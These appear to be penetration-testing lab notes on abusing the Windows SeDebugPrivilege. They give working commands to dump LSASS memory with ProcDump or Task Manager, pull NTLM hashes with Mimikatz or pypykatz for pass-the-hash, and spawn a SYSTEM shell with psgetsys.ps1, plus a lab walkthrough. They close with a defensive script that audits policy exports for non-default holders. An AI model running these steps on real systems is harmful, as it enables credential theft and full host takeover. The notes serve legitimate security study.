# Intro

- To run a particular application or service, or to assist with troubleshooting, a user might be assigned the [SeDebugPrivilege](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/debug-programs) instead of being added to the Administrators group
- This privilege can be assigned via local or domain group policy, under `Computer Settings > Windows Settings > Security Settings`
- By default, only admins are granted this privilege, as it can be used to capture sensitive information from system memory or to access/modify kernel and application structures
- This right may be assigned to devs who need to debug new system components as part of their day-to-day job
- However, this user right should be given out sparingly

# Abusing SeDebug

## ProcDump & Mimikatz

- First, use [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) from [SysInternals](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) to leverage this priv and dump process memory
- A good candidate is the [LSASS](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service) process, which stores user creds after a user logs on to a system

```cmd
C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

- Now load `lsass.dmp` into `mimikatz` using `sekurlsa::minidump`, then use `sekurlsa::logonPasswords` to obtain the NTLM hash of the local admin account logged on locally
- We can then PtH to move laterally

```cmd
C:\htb> mimikatz.exe -q

mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
```

- Note: it is always a good idea to type `log` and `privilege::debug` before running any commands in `mimikatz`; this way all command output is also written to a ".txt" file

## GUI LSASS Dump & pypykatz

- Assume we are unable to load tools onto the Windows target but we have RDP access
- In this case, we can take a manual memory dump of the `LSASS`
process via the Task Manager by browsing to the `Details` tab, choosing the `LSASS` process, and selecting `Create dump file`

![[images/Pasted image 20260218202050.png]]

- After moving this file back to Kali, we can process it locally with `pypykatz`

# RCE as SYSTEM

- Alternatively, we can leverage the `SeDebug` priv for [RCE](https://decoder.cloud/2018/02/02/getting-system/)
- Using this technique, we can elevate our privs to SYSTEM by launching a [child process](https://docs.microsoft.com/en-us/windows/win32/procthread/child-processes) and using the elevated rights granted to our account via `SeDebug` to alter normal system behavior so that the child inherits the token of a [parent process](https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads) and impersonates it
- To this end, if we target a parent process running as SYSTEM (specifying the Process ID (PID) of the target process or running program), we can elevate our rights quickly
- First, transfer this [PoC script](https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1) over to the target system
- Then, open an elevated PowerShell session and list the running processes

```powershell
tasklist
```

- From the above command, we know that we can target `winlogon.exe` running under PID 612 because it always runs as SYSTEM
- Next, run the script by filling in the PID for `winlogon.exe` and the command to run

```powershell
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>,"")
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(612,"c:\windows\system32\cmd.exe","")
```

- Alternatively, use the [Get-Process](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.2) cmdlet to grab the PID of a well-known process that runs as SYSTEM (such as LSASS) and pass the PID directly to the script

```powershell
.\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"c:\windows\system32\cmd.exe","")
```

---
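Tying back to the Intro's point that only Administrators hold this right by default and that any wider assignment should be reviewed: an added example (not from the original notes) that parses a `secedit /export /cfg` policy dump and flags every SeDebugPrivilege holder other than the built-in Administrators group. The sample INF text and the domain SID in it are constructed.

```python
"""Audit a `secedit /export /cfg` dump for SeDebugPrivilege holders.

Added example, not from the original notes: flags any principal granted
SeDebugPrivilege other than the built-in Administrators group (the default).
"""

# Built-in Administrators (S-1-5-32-544) is the only default holder.
EXPECTED_HOLDERS = {"S-1-5-32-544"}

# Constructed sample of a secedit export; the domain SID is a hypothetical
# developer account granted the right via policy.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544,*S-1-5-21-1004336348-1177238915-682003330-1105
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
[Version]
signature="$CHICAGO$"
Revision=1
"""


def parse_privilege_rights(inf_text: str) -> dict[str, list[str]]:
    """Return {privilege: [holders]} from the [Privilege Rights] section."""
    rights: dict[str, list[str]] = {}
    in_section = False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # secedit writes SIDs with a leading '*'; plain names appear bare.
        rights[name.strip()] = [h.strip().lstrip("*") for h in value.split(",") if h.strip()]
    return rights


def audit_sedebug(inf_text: str) -> list[str]:
    """Return SeDebugPrivilege holders beyond the default (empty = clean)."""
    holders = parse_privilege_rights(inf_text).get("SeDebugPrivilege", [])
    return sorted(h for h in holders if h not in EXPECTED_HOLDERS)


if __name__ == "__main__":
    for sid in audit_sedebug(SAMPLE_INF):
        print("non-default SeDebugPrivilege holder:", sid)
```

Real exports are written as UTF-16, so read the file with `open(path, encoding="utf-16")` before passing its contents to `audit_sedebug`.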
# Exercise

- `ping` test

![[images/Pasted image 20260218203245.png]]

- same machine as last section so no `nmap` scan needed
- `rdp` into target with given creds
- light enum on target

![[images/Pasted image 20260218203446.png]]

- we have `mimikatz` and `procdump`
- downgrade to a `cmd` shell, then execute `procdump` to create `lsass.dmp`

```cmd
procdump.exe -accepteula -ma lsass.exe \users\jordan\desktop\lsass.dmp
```

![[images/Pasted image 20260218203735.png]]

- execute `mimikatz`, then run setup commands

![[images/Pasted image 20260218203842.png]]

- import `lsass.dmp`, then run `sekurlsa::logonPasswords`

![[images/Pasted image 20260218204007.png]]